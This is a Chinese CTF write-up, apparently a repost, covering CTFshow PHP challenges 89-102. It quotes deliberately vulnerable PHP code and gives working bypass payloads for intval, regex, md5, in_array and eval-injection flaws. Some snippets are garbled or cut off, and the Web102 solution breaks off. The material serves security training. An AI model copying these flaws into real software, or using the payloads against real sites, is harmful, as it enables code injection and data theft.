ctf中的web的PHP问题,Ctfshow Web入门 - PHP特性（89-102）

最新推荐文章于 2025-07-04 10:26:17 发布

转载最新推荐文章于 2025-07-04 10:26:17 发布 · 1.1k 阅读

文章标签：

本文介绍了多个PHP安全相关的问题，包括文件包含、变量过滤、正则表达式绕过、类型转换漏洞等，并展示了如何利用这些漏洞进行攻击。通过实例解析了如何通过不同进制转换、反射API、命令注入等手段绕过安全防护获取敏感信息，如flag.php中的flag。此外，还涉及了类反射API在PHP5中的应用。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Web89

include("flag.php");highlight_file(__FILE__);if(isset($_GET[‘num‘])){$num = $_GET[‘num‘];if(preg_match("/[0-9]/", $num)){die("no no no!");

}if(intval($num)){echo $flag;

}

num数组绕过

?num[]=0

Web90

include("flag.php");highlight_file(__FILE__);if(isset($_GET[‘num‘])){$num = $_GET[‘num‘];if($num==="4476"){die("no no no!");

}if(intval($num,0)===4476){echo $flag;

}else{echo intval($num,0);

}

base为0，在传参时添加0x绕过

?num=0x117c

Web91

show_source(__FILE__);include(‘flag.php‘);$a=$_GET[‘cmd‘];if(preg_match(‘/^php$/im‘, $a)){if(preg_match(‘/^php$/i‘, $a)){echo ‘hacker‘;

}else{echo $flag;

}

}else{echo ‘nonononono‘;

}

字符 ^ 和 $ 同时使用时，表示精确匹配

/i匹配大小写，/m匹配换行，一般不加/m是不匹配换行以后的左右两端的内容

由于匹配是要以php开头，我们可以在php之前加上换行绕过

?cmd=%0aphp

Web92-95

解法相似

1.利用90题中intval的特性使用不同进制绕过

2.多了一句判断

if(!strpos($num, "0")){die("no no no!!!");

}

看似没法继续用八进制绕过，其实使用非数字符号可以绕过，让查找返回false

}else

echo("yes!")?>

payload举例：

?num=%20010574

Web96

if(isset($_GET[‘u‘])){if($_GET[‘u‘]==‘flag.php‘){die("no no no");

}else{highlight_file($_GET[‘u‘]);

}

没想到啥，看payload是加./绕过的，读取当前目录下

Web97

include("flag.php");highlight_file(__FILE__);if (isset($_POST[‘a‘]) and isset($_POST[‘b‘])) {if ($_POST[‘a‘] != $_POST[‘b‘])if (md5($_POST[‘a‘]) === md5($_POST[‘b‘]))echo $flag;else

print ‘Wrong.‘;

}

但这里没法实现，原因不明

拿数组可以绕过a[]=1&b[]=2

Web98

include("flag.php");$_GET?$_GET=&$_POST:‘flag‘;$_GET[‘flag‘]==‘flag‘?$_GET=&$_COOKIE:‘flag‘;$_GET[‘flag‘]==‘flag‘?$_GET=&$_SERVER:‘flag‘;highlight_file($_GET[‘HTTP_FLAG‘]==‘flag‘?$flag:__FILE__);

html的三元运算符

$_GET?$_GET=&$_POST:‘flag‘;

表示如果GET传参，则用POST传参flag覆盖

$_GET[‘flag‘]==‘flag‘?$_GET=&$_COOKIE:‘flag‘;

同理如果GET传参是flag字符串，则用cookie传参的flag覆盖

以下同理

$_GET[‘flag‘]==‘flag‘?$_GET=&$_SERVER:‘flag‘;

highlight_file($_GET[‘HTTP_FLAG‘]==‘flag‘?$flag:__FILE__);

如果传参的HTTP_FLAG为flag字符串，则读取flag文件，最后highlight显示

就是说GET要传参，但不能传flag，要拿POST的HTTP_FLAG传flag

Web99

highlight_file(__FILE__);$allow = array();for ($i=36; $i < 0x36d; $i++) {array_push($allow, rand(1,$i));

}if(isset($_GET[‘n‘]) && in_array($_GET[‘n‘], $allow)){file_put_contents($_GET[‘n‘], $_POST[‘content‘]);

}

首先是定义一个数组，然后向数组里面插入随机数，当GET传参的内容符合数组里随机数时，向传参名字的文件里写入POST的content内容

不是很懂怎么解法，看了hint

//in_array()函数有漏洞没有设置第三个参数就可以形成自动转换

//eg:n=1.php自动转换为1

就是说in_array()的type没有设置为true，则不存在的值会不检测，自动转换

Web100

highlight_file(__FILE__);include("ctfshow.php");//flag in class ctfshow;

}

ctfshow类开辟空间，提示我们flag在ctfshow类里面

看了代码有迷惑我们的$v2(‘ctfshow‘)$v3，其中v2肯定是命令，v3传分号

v0是三个值相与，v2和v3不传数字和v1数字相与就为1

payload：

?v1=1&v2=var_dump($ctfshow)&v3=;

或者v3直接用内联注释注释掉

?v1=1&v2=var_dump($ctfshow)/*&v3=*/;

到这一步看不懂编码问题，问了出题人才知道，替换0x2d(十六进制ASCII的‘-’符号)

Web101

include("ctfshow.php");//flag in class ctfshow;

$ctfshow = newctfshow();$v1=$_GET[‘v1‘];$v2=$_GET[‘v2‘];$v3=$_GET[‘v3‘];$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);if($v0){if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\‘|\,|\.|\;|\?|[0-9]/", $v2)){if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\‘|\,|\.|\?|[0-9]/", $v3)){eval("$v2(‘ctfshow‘)$v3");

}

过滤了很多符号，不能用var_dump输出信息

看了hint考的是类反射

PHP Reflection API是PHP5才有的新功能，它是用来导出或提取出关于类、方法、属性、参数等的详细信息，包括注释。

$class = new ReflectionClass(‘Person‘); // 建立 Person这个类的反射类

$instance = $class->newInstanceArgs($args); // 相当于实例化Person 类

构造语句导出类信息

?v1=1&v2=echo new Reflectionclass&v3=;

Web102

highlight_file(__FILE__);$v1 = $_POST[‘v1‘];$v2 = $_GET[‘v2‘];$v3 = $_GET[‘v3‘];$v4 = is_numeric($v2) and is_numeric($v3);if($v4){$s = substr($v2,2);$str = call_user_func($v1,$s);echo $str;file_put_contents($v3,$str);

}else{die(‘hacker‘);

}

substr截取字符串